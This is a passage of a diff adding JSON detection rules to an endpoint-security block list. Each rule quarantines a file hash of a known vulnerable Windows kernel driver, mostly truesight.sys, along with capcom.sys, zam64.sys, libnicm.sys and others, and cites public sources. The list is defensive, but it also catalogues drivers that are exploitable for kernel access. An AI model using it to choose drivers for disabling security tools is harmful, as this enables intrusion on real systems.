+ "comment": "NVIDIA vulnerable flash tool (aka nvflash.sys nd nvflsh64.sys) [CVE-2019-5688] [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ec4e29c1-20f2-5ca1-a0e7-21bef6b25cf6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.473701Z",
+ "creation_date": "2026-03-23T11:45:31.473705Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.473715Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "09969e2f95e2468871720c997f479c1e7eec291f9508d8bab54c097649566538",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ec59c5b0-cb29-51b6-be49-befb1da34ac3",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.817116Z",
+ "creation_date": "2026-03-23T11:45:31.817117Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.817123Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "70596abead023e751825869d88ab90ebce30d5dd5dd91a4843846c34b7c81dfc",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ec5b1eed-3a22-54c6-9c4c-b9a7d5930607",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.473945Z",
+ "creation_date": "2026-03-23T11:45:31.473958Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.473968Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1452d24bb5e59c62c57be70d13751ed1b64ffbc70f58767afee40b132e39fd70",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ec5eb4cc-ff6d-5ee5-9489-9727761eafde",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.479775Z",
+ "creation_date": "2026-03-23T11:45:30.479777Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.479782Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ac26150bc98ee0419a8b23e4cda3566e0eba94718ba8059346a9696401e9793d",
+ "comment": "Vulnerable Kernel Driver (aka capcom.sys) [https://www.loldrivers.io/drivers/b51c441a-12c7-407d-9517-559cc0030cf6/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ec707408-bd85-53a1-bc1e-a705bfdee506",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.148205Z",
+ "creation_date": "2026-03-23T11:45:31.148207Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.148213Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "02436f1be9a7bd6d83e2166d256df9d7d009c58423a5f534181566575f065475",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ec82d587-a9f1-5196-9f9e-cc487dfa3d2a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.620852Z",
+ "creation_date": "2026-03-23T11:45:29.620854Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.620860Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5be61901f41d55e6fbd0994869015448f8eb0450ae38f67b75ddb594c3325aac",
+ "comment": "IBM Vulnerable Physmem drivers (aka citmdrv_amd64.sys and citmdrv_ia64.sys) [https://www.loldrivers.io/drivers/0f21a584-6ace-4242-82cb-9766cea6973a/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ec9749b9-c875-5de9-b273-d7035afd53a7",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.492055Z",
+ "creation_date": "2026-03-23T11:45:31.492057Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.492062Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "65c5ce7ced3df894429ae5afc7280d5f41a46af2bed07bd67915c338f62c0ed3",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ec982844-38dd-5f8c-b0b1-6a5ce724060b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.144617Z",
+ "creation_date": "2026-03-23T11:45:31.144618Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.144624Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "aa99f49439a62d581d688d0fa420677d7fb45bc68ad6a998237b32f0acd44abe",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ec9b57fa-3fc8-5f62-ad35-33f7bafafb3d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.489281Z",
+ "creation_date": "2026-03-23T11:45:31.489284Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.489292Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "25be784945f4308c9e2ee97b66132d938b4a0b298f09bc837809f312257bff10",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "eca8f958-78b9-5c3c-88cc-2caffb98c29f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.971696Z",
+ "creation_date": "2026-03-23T11:45:29.971698Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.971703Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "27f5c5eb9a5fc9e02d3ac3cd83fc26b07f3d0143b03db69d6dcf7554d0c50fb6",
+ "comment": "MalwareFox AntiMalware Vulnerable Driver (aka zam64.sys and zam32.sys) [CVE-2021-31727, CVE-2021-31728] [https://www.loldrivers.io/drivers/e5f12b82-8d07-474e-9587-8c7b3714d60c/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ecb1ec53-0ffb-5345-acce-4a68bd1c0d2f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.834353Z",
+ "creation_date": "2026-03-23T11:45:30.834356Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.834365Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ce3b64eb877bfb70bfa2b7b436a40e95d59a21999f14218bc34bf588bd7b06bd",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ecb708fa-2483-5b89-8f08-d2f73a9b3155",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.477741Z",
+ "creation_date": "2026-03-23T11:45:31.477745Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.477755Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f3c55a31740816e8aba78ab270aa26999da006dcea48e73cae0b6bee2e326f4b",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ecc12212-a9b6-524e-9544-088928d606ba",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.499590Z",
+ "creation_date": "2026-03-23T11:45:31.499593Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.499602Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a5c69d0f3777e09938fc2ecc46b688189241467166c38d9cce8a3ca5379e27e7",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ecc5e407-be8e-5825-a998-96feca5bbedb",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.141576Z",
+ "creation_date": "2026-03-23T11:45:31.141578Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.141584Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "dc7bd7db82d8aba66b589dc5b48e114df6d20c121b088295ed55798cf6deb427",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ecce9d9a-b037-5514-9ff4-bd171876320a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.472955Z",
+ "creation_date": "2026-03-23T11:45:31.472958Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.472966Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d4522bc656775881708a62fa68dfc0eaee7cc91b542003b426cdc1f6243bb447",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ecde9558-37de-5be8-ace3-7a82be3d474d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.975673Z",
+ "creation_date": "2026-03-23T11:45:29.975675Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.975680Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "cf3180f5308af002ac5d6fd5b75d1340878c375f0aebc3157e3bcad6322b7190",
+ "comment": "Novell XTier vulnerable driver (aka libnicm.sys) [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ecec630f-04b2-5cc6-a7c5-8a841d48db88",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.159085Z",
+ "creation_date": "2026-03-23T11:45:31.159088Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.159093Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3e7256f5675f54672942fb1300a20c721bf437cdb4426ba7c412c8ab5fcb1321",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ecf093cc-21aa-55c8-9706-9bef5833626c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.820355Z",
+ "creation_date": "2026-03-23T11:45:30.820357Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.820363Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e3dbafce5ad2bf17446d0f853aeedf58cc25aa1080ab97e22375a1022d6acb16",
+ "comment": "Vulnerable Kernel Driver (aka rtport.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ecf7870f-0dd6-5477-bb0c-a70660d579b6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.807796Z",
+ "creation_date": "2026-03-23T11:45:31.807799Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.807806Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "195b6b52d6279cbb21ad736aa73aa01f61a065a4d5dcf8a41a7ee36b9f108a53",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ecff96fc-71e7-5701-b544-ca995e264b3a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.476973Z",
+ "creation_date": "2026-03-23T11:45:31.476977Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.476987Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2e882e73f6cced1a165085580a41d3f1e7659c6d99644a7770d1f385a6668bce",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ed0de857-cf10-5ccb-9bdc-022d9dc4daee",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.824137Z",
+ "creation_date": "2026-03-23T11:45:31.824140Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.824148Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c35a097545fdb2fa0d3b1a1b69e7222629b19eca8347f0a8c23b4603959490fb",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ed214459-5d8c-5901-82ad-2511de7ec128",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.155684Z",
+ "creation_date": "2026-03-23T11:45:31.155686Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.155691Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8cede7500fbd30800c1d05cd70d9ea3c936b20805e62c6e9be432c1fbb1a5a18",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
